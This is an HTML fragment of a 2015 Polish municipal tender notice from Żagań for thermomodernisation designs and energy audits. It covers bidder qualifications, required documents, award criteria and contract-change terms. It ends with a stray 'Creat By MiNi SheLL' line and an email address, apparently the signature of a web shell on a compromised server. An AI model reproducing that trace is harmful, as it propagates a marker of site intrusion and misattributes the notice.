Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od  charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia.  
Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z wykonawcą za szkodę  zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi  winy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi   do   wykonania zamówienia,  Zamawiający uzna za spełniającego te wymogi  tego Wykonawcę, który  będzie dysponował  osobami  posiadającymi uprawnienia do projektowania w specjalności :  
- architektonicznej bez ograniczeń lub konstrukcyjno-budowlanej bez ograniczeń,
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,   wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i teletechnicznych, 
- oraz będzie dysponował osobą  z licencją audytora energetycznego. 
    
Wykonawcy występujący  wspólnie  powyższy warunek mogą spełnić łącznie.  
   
Na potwierdzenie spełnienia w/w warunków Wykonawca złoży wykaz potencjału  osobowego dostępnego Wykonawcy  w celu wykonania zamówienia  wraz z informacją o podstawie dysponowania  tymi zasobami. 
W   tym zakresie  Wykonawca może polegać na  zasobach innych  podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest  udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie  realizacji zamówienia, w  szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na potrzeby wykonania zamówienia. 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie  z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,  Zamawiający nie stawia żadnych szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główną usługę Zamawiający uznaje : sporządzanie  projektów termomodernizacji, projektów termomodernizacji budynków użyteczności publicznej, audytów energetycznych wraz z projektami wykonawczymi termomodernizacji budynków użyteczności publicznej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ewentualne pełnomocnictwo- w zakresie określonym w SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin Wykonania - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.6.  Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy :

1) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem  że:  
a) prace objęte umową  nie mogą być prowadzone z przyczyn niezależnych od Wykonawcy i są następstwem działania  organów administracji lub innych podmiotów o kompetencjach zbliżonych do organów administracji lub są następstwem okoliczności leżących po stronie Zamawiającego,  
Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub postoju;
    
2) w zakresie zmiany lub rezygnacji z Podwykonawcy : 
a)  na którego zasoby Wykonawca  powoływał się w celu wykazania spełnienia warunków udziału w postepowaniu, lub 
b)  z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia   publicznego, 
pod warunkiem, że : - Wykonawca  wykaże, iż proponowany inny podwykonawca spełnia warunki udziału w postepowaniu w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia; lub  
-  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postpowania o udzielenie zamówienia;

3) w zakresie dopuszczenia Podwykonawcy  lub dalszego Podwykonawcy pod warunkiem wykazania iż Podwykonawca lub dalszy Podwykonawca  spełnia warunki udziału w postępowaniu, w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia; 

4) w zakresie zmiany osób odpowiedzialnych za wykonanie przedmiotu umowy, w przypadku gdy zmiana tych osób stanie się konieczną z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacja, choroba, itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl   w Bipie /zakladka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy 
Urząd  Miasta  Żagań,  68-100 Żagań, Plac Słowiański 17, w pokoju nr 26 (w Wydziale Zamówień  Publicznych i Nadzoru Właścicielskiego)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2015 godzina 11:00, miejsce: Urząd Miasta  Żagań, 68-100 Żagań,  Plac Słowiański 17, pok. nr 26 ( Wydział  Zamówień  Publicznych i Nadzoru Właścicielskiego).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com